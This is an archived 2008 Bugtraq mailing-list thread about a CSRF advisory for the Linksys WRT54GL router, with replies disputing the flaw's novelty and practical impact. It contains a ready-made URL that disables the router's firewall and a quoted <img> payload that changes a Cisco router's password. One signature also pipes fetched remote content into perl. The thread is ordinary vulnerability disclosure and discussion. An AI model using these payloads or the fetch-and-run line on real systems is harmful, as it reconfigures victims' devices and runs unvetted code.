Advanced
Mailing List Archive

Mailing List Archive

  1. Home >
  2. Bugtraq>
  3. Bugtraq
Linksys WRT54 GL - Session riding (CSRF)
tomaz.bratusa at teamintell
Jan 7, 2008, 1:40 AM
Post #1 of 9 (6009 views)
Permalink
====================================================================================
Team Intell Security Advisory TISA2008-01
------------------------------------------------------------------------------------
Linksys WRT54 GL - Session riding (CSRF)
====================================================================================


Release date: 07.01.2008
Severity: High
Remote-Exploit: yes
Impact: Session riding
Status: Official patch not available
Software: Linksys WRT54 GL
Tested on: firmware version 4.30.9
Vendor: http://www.linksys.com/
Vendor-Status: informed on 14.08.2007
Disclosed by: Tomaz Bratusa (Team Intell)[TISA-2008-01]


Introduction
============

The Linksys Wireless-G Broadband Router is really three devices in one box. First, there's the Wireless Access Point, which lets you connect both screaming fast Wireless-G (802.11g at 54Mbps) and Wireless-B (802.11b at 11Mbps) devices to the network. There's also a built-in 4-port full-duplex 10/100 Switch to connect your wired-Ethernet devices together. Connect four PCs directly, or attach more hubs and switches to create as big a network as you need. Finally, the Router function ties it all together and lets your whole network share a high-speed cable or DSL Internet connection.


Security Risk
=============
Linksys WRT54GL is prone to an authentication-bypass vulnerability. Reportedly, the device permits changes in its configuration settings without requring authentication (CSRF).



Technical Description
=====================
Linksys WRT54GL is prone to an authentication-bypass vulnerability. The problem presents itself when a victim user visits a specially crafted web page on an attacker-controlled site. An attacker can exploit this vulnerability to bypass authentication and modify the configuration settings of the device.

If the administrator of Linksys WRT54GL is logged into the device and opens a malicious website or email with the same browser, he is subject to attacks.
Imagine the worst case, where the administrator is constantly logged into his firewall appliance because he needs to configure changes throughout
the day. A malicious link executing unnoticed by the administrator may open the firewall.

This issue is reported to affect firmware version 4.30.9; other firmware versions may also be affected.


PoC
===
https://192.168.1.1/apply.cgi?submit_button=Firewall&change_action=&action=Apply&block_wan=1&block_loopback=0&multicast_pass=0&ident_pass=0&block_cookie=0&block_java=0&block_proxy=0&block_activex=0&filter=off&_block_wan=1&_block_multicast=0&_ident_pass=1

Folowing the previous link will disable the firewall on 192.168.1.1 on your LAN.


Workaround:
============
1.No official patch yet.

2.Do not surf the web when you are configuring your router.


References:
-------------------------------------------------
http://en.wikipedia.org/wiki/Cross-site_request_forgery

History/Timeline
================
14.08.2007 discovery of the vulnerability
14.08.2007 contacted the vendor
14.08.2008 Response from Cisco - They are working on it
22.10.2007 Request for status
30.10.2007 Response from Cisco - They will include the patch in the next firmware upgrade
07.01.2008 advisory is written
07.01.2008 Vulnerability is made public


---------
Contact:
---------

Maldin d.o.o.
Trzaska cesta 2
1000 Ljubljana - SI

tel: +386 (0)590 70 170
fax: +386 (0)590 70 177
gsm: +386 (0)31 816 400
web: www.teamintell.com
www.varnostne-novice.com
e-mail: info(at)teamintell.com


------------
Disclaimer:
------------

The content of this report is purely informational and meant for educational purposes only. Maldin d.o.o. shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. Any use of information in this advisory is entirely at user's own risk.
Re: Linksys WRT54 GL - Session riding (CSRF) [ In reply to ]
janheisterkamp at web
Jan 7, 2008, 11:19 AM
Post #2 of 9 (5929 views)
Permalink
Hi Tomaz,
this is not correct, you will be warned that "There is a problem with
this website's security certificate." IE7, you will receive a similar
warning with Mozilla 2.0.0.11.
The Router/ Firewall remains running and stable until you don't accept
the certificate.

> If the administrator of Linksys WRT54GL is logged into the device and opens a malicious website or email with the same browser, he is subject to attacks.

He should be fired...
> Imagine the worst case, where the administrator is constantly logged into his firewall appliance because he needs to configure changes throughout

He should be fired too...

Regards,
Jan

tomaz.bratusa@teamintell.com wrote:
> ====================================================================================
>
> Team Intell Security Advisory TISA2008-01
>
> ------------------------------------------------------------------------------------
>
> Linksys WRT54 GL - Session riding (CSRF)
>
> ====================================================================================
>
>
>
>
>
> Release date: 07.01.2008
>
> Severity: High
>
> Remote-Exploit: yes
>
> Impact: Session riding
>
> Status: Official patch not available
>
> Software: Linksys WRT54 GL
>
> Tested on: firmware version 4.30.9
>
> Vendor: http://www.linksys.com/
>
> Vendor-Status: informed on 14.08.2007
>
> Disclosed by: Tomaz Bratusa (Team Intell)[TISA-2008-01]
>
>
>
>
>
> Introduction
>
> ============
>
>
>
> The Linksys Wireless-G Broadband Router is really three devices in one box. First, there's the Wireless Access Point, which lets you connect both screaming fast Wireless-G (802.11g at 54Mbps) and Wireless-B (802.11b at 11Mbps) devices to the network. There's also a built-in 4-port full-duplex 10/100 Switch to connect your wired-Ethernet devices together. Connect four PCs directly, or attach more hubs and switches to create as big a network as you need. Finally, the Router function ties it all together and lets your whole network share a high-speed cable or DSL Internet connection.
>
>
>
>
>
> Security Risk
>
> =============
>
> Linksys WRT54GL is prone to an authentication-bypass vulnerability. Reportedly, the device permits changes in its configuration settings without requring authentication (CSRF).
>
>
>
>
>
>
>
> Technical Description
>
> =====================
>
> Linksys WRT54GL is prone to an authentication-bypass vulnerability. The problem presents itself when a victim user visits a specially crafted web page on an attacker-controlled site. An attacker can exploit this vulnerability to bypass authentication and modify the configuration settings of the device.
>
>
>
> If the administrator of Linksys WRT54GL is logged into the device and opens a malicious website or email with the same browser, he is subject to attacks.
>
> Imagine the worst case, where the administrator is constantly logged into his firewall appliance because he needs to configure changes throughout
>
> the day. A malicious link executing unnoticed by the administrator may open the firewall.
>
>
>
> This issue is reported to affect firmware version 4.30.9; other firmware versions may also be affected.
>
>
>
>
>
> PoC
>
> ===
>
> https://192.168.1.1/apply.cgi?submit_button=Firewall&change_action=&action=Apply&block_wan=1&block_loopback=0&multicast_pass=0&ident_pass=0&block_cookie=0&block_java=0&block_proxy=0&block_activex=0&filter=off&_block_wan=1&_block_multicast=0&_ident_pass=1
>
>
>
> Folowing the previous link will disable the firewall on 192.168.1.1 on your LAN.
>
>
>
>
>
> Workaround:
>
> ============
>
> 1.No official patch yet.
>
>
>
> 2.Do not surf the web when you are configuring your router.
>
>
>
>
>
> References:
>
> -------------------------------------------------
>
> http://en.wikipedia.org/wiki/Cross-site_request_forgery
>
>
>
> History/Timeline
>
> ================
>
> 14.08.2007 discovery of the vulnerability
>
> 14.08.2007 contacted the vendor
>
> 14.08.2008 Response from Cisco - They are working on it
>
> 22.10.2007 Request for status
>
> 30.10.2007 Response from Cisco - They will include the patch in the next firmware upgrade
>
> 07.01.2008 advisory is written
>
> 07.01.2008 Vulnerability is made public
>
>
>
>
>
> ---------
>
> Contact:
>
> ---------
>
>
>
> Maldin d.o.o.
>
> Trzaska cesta 2
>
> 1000 Ljubljana - SI
>
>
>
> tel: +386 (0)590 70 170
>
> fax: +386 (0)590 70 177
>
> gsm: +386 (0)31 816 400
>
> web: www.teamintell.com
>
> www.varnostne-novice.com
>
> e-mail: info(at)teamintell.com
>
>
>
>
>
> ------------
>
> Disclaimer:
>
> ------------
>
>
>
> The content of this report is purely informational and meant for educational purposes only. Maldin d.o.o. shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. Any use of information in this advisory is entirely at user's own risk.
>
>


--
Grupo Ampersand S.A.
IT-Security Consultants & Auditors
Apdo. 924 Escazu 1250
Costa Rica C.A.
Phone: (506)588-0432
ceo_at_ampersanded.com [corp.]
janheisterkamp_at_web.de [priv.]
Re: Linksys WRT54 GL - Session riding (CSRF) [ In reply to ]
janheisterkamp at web
Jan 7, 2008, 11:42 AM
Post #3 of 9 (5915 views)
Permalink
Additional don't work on Firmware V 6.0
J.
tomaz.bratusa@teamintell.com schrieb:
> ====================================================================================
>
> Team Intell Security Advisory TISA2008-01
>
> ------------------------------------------------------------------------------------
>
> Linksys WRT54 GL - Session riding (CSRF)
>
> ====================================================================================
>
>
>
>
>
> Release date: 07.01.2008
>
> Severity: High
>
> Remote-Exploit: yes
>
> Impact: Session riding
>
> Status: Official patch not available
>
> Software: Linksys WRT54 GL
>
> Tested on: firmware version 4.30.9
>
> Vendor: http://www.linksys.com/
>
> Vendor-Status: informed on 14.08.2007
>
> Disclosed by: Tomaz Bratusa (Team Intell)[TISA-2008-01]
>
>
>
>
>
> Introduction
>
> ============
>
>
>
> The Linksys Wireless-G Broadband Router is really three devices in one box. First, there's the Wireless Access Point, which lets you connect both screaming fast Wireless-G (802.11g at 54Mbps) and Wireless-B (802.11b at 11Mbps) devices to the network. There's also a built-in 4-port full-duplex 10/100 Switch to connect your wired-Ethernet devices together. Connect four PCs directly, or attach more hubs and switches to create as big a network as you need. Finally, the Router function ties it all together and lets your whole network share a high-speed cable or DSL Internet connection.
>
>
>
>
>
> Security Risk
>
> =============
>
> Linksys WRT54GL is prone to an authentication-bypass vulnerability. Reportedly, the device permits changes in its configuration settings without requring authentication (CSRF).
>
>
>
>
>
>
>
> Technical Description
>
> =====================
>
> Linksys WRT54GL is prone to an authentication-bypass vulnerability. The problem presents itself when a victim user visits a specially crafted web page on an attacker-controlled site. An attacker can exploit this vulnerability to bypass authentication and modify the configuration settings of the device.
>
>
>
> If the administrator of Linksys WRT54GL is logged into the device and opens a malicious website or email with the same browser, he is subject to attacks.
>
> Imagine the worst case, where the administrator is constantly logged into his firewall appliance because he needs to configure changes throughout
>
> the day. A malicious link executing unnoticed by the administrator may open the firewall.
>
>
>
> This issue is reported to affect firmware version 4.30.9; other firmware versions may also be affected.
>
>
>
>
>
> PoC
>
> ===
>
> https://192.168.1.1/apply.cgi?submit_button=Firewall&change_action=&action=Apply&block_wan=1&block_loopback=0&multicast_pass=0&ident_pass=0&block_cookie=0&block_java=0&block_proxy=0&block_activex=0&filter=off&_block_wan=1&_block_multicast=0&_ident_pass=1
>
>
>
> Folowing the previous link will disable the firewall on 192.168.1.1 on your LAN.
>
>
>
>
>
> Workaround:
>
> ============
>
> 1.No official patch yet.
>
>
>
> 2.Do not surf the web when you are configuring your router.
>
>
>
>
>
> References:
>
> -------------------------------------------------
>
> http://en.wikipedia.org/wiki/Cross-site_request_forgery
>
>
>
> History/Timeline
>
> ================
>
> 14.08.2007 discovery of the vulnerability
>
> 14.08.2007 contacted the vendor
>
> 14.08.2008 Response from Cisco - They are working on it
>
> 22.10.2007 Request for status
>
> 30.10.2007 Response from Cisco - They will include the patch in the next firmware upgrade
>
> 07.01.2008 advisory is written
>
> 07.01.2008 Vulnerability is made public
>
>
>
>
>
> ---------
>
> Contact:
>
> ---------
>
>
>
> Maldin d.o.o.
>
> Trzaska cesta 2
>
> 1000 Ljubljana - SI
>
>
>
> tel: +386 (0)590 70 170
>
> fax: +386 (0)590 70 177
>
> gsm: +386 (0)31 816 400
>
> web: www.teamintell.com
>
> www.varnostne-novice.com
>
> e-mail: info(at)teamintell.com
>
>
>
>
>
> ------------
>
> Disclaimer:
>
> ------------
>
>
>
> The content of this report is purely informational and meant for educational purposes only. Maldin d.o.o. shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. Any use of information in this advisory is entirely at user's own risk.
>
>


--
Grupo Ampersand S.A.
IT-Security Consultants & Auditors
Apdo. 924 Escazu 1250
Costa Rica C.A.
Phone: (506)588-0432
ceo_at_ampersanded.com [corp.]
janheisterkamp_at_web.de [priv.]
Re: Linksys WRT54 GL - Session riding (CSRF) [ In reply to ]
fw at deneb
Jan 11, 2008, 2:54 AM
Post #4 of 9 (5907 views)
Permalink
* tomaz bratusa:

> Linksys WRT54GL is prone to an authentication-bypass
> vulnerability. Reportedly, the device permits changes in its
> configuration settings without requring authentication (CSRF).

This specific attack scenario has been publicly documented for a long
time (note the final paragraph):

| Isn't your exploit somewhat complicated? Just put
|
| <img src="http://192.0.2.1/level/15/configure/-/enable/secret/mypassword"/>
|
| on a web page, and trick the victim to visit it while he or she is
| logged into the Cisco router at 192.0.2.1 over HTTP. This has been
| dubbed "Cross-Site Request Forgery" a couple of years ago, but the
| authors of RFC 2109 were already aware of it in 1997. At that time,
| browser-side countermeasures were proposed (such as users examining
| the HTML source code *cough*), but current practice basically mandates
| that browsers transmit authentication information when following
| cross-site links.
|
| Such attacks are probably more problematic on low-end NAT routers
| whose internal address defaults to 192.168.1.1 and which generally
| offer HTTP access, which makes shotgun exploitation easier. So much
| for the "put your Windows box behind a NAT router" advice you often
| read.

<http://article.gmane.org/gmane.comp.security.bugtraq/20579>

Cisco PSIRT had been approached about this issue a couple of months
before that BUGTRAQ posting, IIRC.
RE: Linksys WRT54 GL - Session riding (CSRF) [ In reply to ]
tomaz.bratusa at teamintell
Jan 13, 2008, 11:20 PM
Post #5 of 9 (5887 views)
Permalink
Ok, and what does it change...there are still the same vulnerabilities in
their equipment. Should we stop checking and publishing them just because
somebody informed the vendor 2 years ago?

-----Original Message-----
From: Florian Weimer [mailto:info@plot.uz]
Sent: 11. januar 2008 11:54
To: tomaz.bratusa@teamintell.com
Cc: bugtraq@securityfocus.com
Subject: Re: Linksys WRT54 GL - Session riding (CSRF)

* tomaz bratusa:

> Linksys WRT54GL is prone to an authentication-bypass
> vulnerability. Reportedly, the device permits changes in its
> configuration settings without requring authentication (CSRF).

This specific attack scenario has been publicly documented for a long
time (note the final paragraph):

| Isn't your exploit somewhat complicated? Just put
|
| <img
src="http://192.0.2.1/level/15/configure/-/enable/secret/mypassword"/>
|
| on a web page, and trick the victim to visit it while he or she is
| logged into the Cisco router at 192.0.2.1 over HTTP. This has been
| dubbed "Cross-Site Request Forgery" a couple of years ago, but the
| authors of RFC 2109 were already aware of it in 1997. At that time,
| browser-side countermeasures were proposed (such as users examining
| the HTML source code *cough*), but current practice basically mandates
| that browsers transmit authentication information when following
| cross-site links.
|
| Such attacks are probably more problematic on low-end NAT routers
| whose internal address defaults to 192.168.1.1 and which generally
| offer HTTP access, which makes shotgun exploitation easier. So much
| for the "put your Windows box behind a NAT router" advice you often
| read.

<http://article.gmane.org/gmane.comp.security.bugtraq/20579>

Cisco PSIRT had been approached about this issue a couple of months
before that BUGTRAQ posting, IIRC.
Re: Linksys WRT54 GL - Session riding (CSRF) [ In reply to ]
sil at infiltrated
Jan 14, 2008, 9:31 AM
Post #6 of 9 (5898 views)
Permalink
> | Isn't your exploit somewhat complicated? Just put
> |
> | <img
> src="http://192.0.2.1/level/15/configure/-/enable/secret/mypassword"/>
> |
> | on a web page, and trick the victim to visit it while he or she is
> | logged into the Cisco router at 192.0.2.1 over HTTP. This has been
> | dubbed "Cross-Site Request Forgery" a couple of years ago, but the
> | authors of RFC 2109 were already aware of it in 1997.


With an swf file using php one wouldn't need to trick someone entirely,
just hope they don't have a pop up blocker


http://www.infiltrated.net/nojava.pimp

--
====================================================
J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xF684C42E

Attached Files:

Re: Linksys WRT54 GL - Session riding (CSRF) [ In reply to ]
janheisterkamp at web
Jan 14, 2008, 10:58 AM
Post #7 of 9 (5902 views)
Permalink
> A malicious link executing unnoticed by the administrator may open the firewall.

The catch is that this exploit don't work unnoticed, because the admin
get notification in the browser that there has occured an error with the
cerificate [."Unable to verify the identity of Linksys as a trusted
site"] and he has explicity allow it. In other words first he has to
allow to be attacked...
Jan

Tomaz schrieb:
> Ok, and what does it change...there are still the same vulnerabilities in
> their equipment. Should we stop checking and publishing them just because
> somebody informed the vendor 2 years ago?
>
> -----Original Message-----
> From: Florian Weimer [mailto:info@plot.uz]
> Sent: 11. januar 2008 11:54
> To: tomaz.bratusa@teamintell.com
> Cc: bugtraq@securityfocus.com
> Subject: Re: Linksys WRT54 GL - Session riding (CSRF)
>
> * tomaz bratusa:
>
>> Linksys WRT54GL is prone to an authentication-bypass
>> vulnerability. Reportedly, the device permits changes in its
>> configuration settings without requring authentication (CSRF).
>
> This specific attack scenario has been publicly documented for a long
> time (note the final paragraph):
>
> | Isn't your exploit somewhat complicated? Just put
> |
> | <img
> src="http://192.0.2.1/level/15/configure/-/enable/secret/mypassword"/>
> |
> | on a web page, and trick the victim to visit it while he or she is
> | logged into the Cisco router at 192.0.2.1 over HTTP. This has been
> | dubbed "Cross-Site Request Forgery" a couple of years ago, but the
> | authors of RFC 2109 were already aware of it in 1997. At that time,
> | browser-side countermeasures were proposed (such as users examining
> | the HTML source code *cough*), but current practice basically mandates
> | that browsers transmit authentication information when following
> | cross-site links.
> |
> | Such attacks are probably more problematic on low-end NAT routers
> | whose internal address defaults to 192.168.1.1 and which generally
> | offer HTTP access, which makes shotgun exploitation easier. So much
> | for the "put your Windows box behind a NAT router" advice you often
> | read.
>
> <http://article.gmane.org/gmane.comp.security.bugtraq/20579>
>
> Cisco PSIRT had been approached about this issue a couple of months
> before that BUGTRAQ posting, IIRC.
>
>
>


--
Grupo Ampersand S.A.
IT-Security Consultants & Auditors
Apdo. 924 Escazu 1250
Costa Rica C.A.
Phone: (506)588-0432
ceo_at_ampersanded.com [corp.]
janheisterkamp_at_web.de [priv.]
Re: Linksys WRT54 GL - Session riding (CSRF) [ In reply to ]
dweber at calyptix
Jan 15, 2008, 10:08 AM
Post #8 of 9 (5887 views)
Permalink
> The catch is that this exploit don't work unnoticed, because the admin
> get notification in the browser that there has occured an error with the
> cerificate [."Unable to verify the identity of Linksys as a trusted
> site"] and he has explicity allow it. In other words first he has to
> allow to be attacked...
It's generally (although not always!) a requirement of CSRF that the
user has already logged in. So there won't be any new notification
window popping up.

It will make it harder for the attacker to stealthily attack multiple
targets without someone noticing, though.

Like Basic Authentication (which is ugly for the end-user, but browsers
can defend slightly better against attacks over it), this is one of the
cases where a little bit of user friction helps reduce attacks.

It's an open question as to whether end users pay attention to security
pop-ups at all. :)
Re: Linksys WRT54 GL - Session riding (CSRF) [ In reply to ]
Valdis.Kletnieks at vt
Jan 15, 2008, 10:14 AM
Post #9 of 9 (5902 views)
Permalink
On Mon, 14 Jan 2008 12:58:17 CST, Jan Heisterkamp said:
> > A malicious link executing unnoticed by the administrator may open the firewall.
>
> The catch is that this exploit don't work unnoticed, because the admin
> get notification in the browser that there has occured an error with the
> cerificate [."Unable to verify the identity of Linksys as a trusted
> site"] and he has explicity allow it. In other words first he has to
> allow to be attacked...

A very high percentage of Joe Sixpack "sysadmins" sitting at home surfing
for Nascar and pr0n will go "Yeah, whatever" and click OK anyhow. A long time
ago, I stopped thinking that "User must click OK to scary-looking message"
was any sort of road bump for malware.

©2024 GT.net. A Gossamer Threads company.
5th Floor, 455 Granville St., Vancouver, BC V6C 1T1, Canada | Legal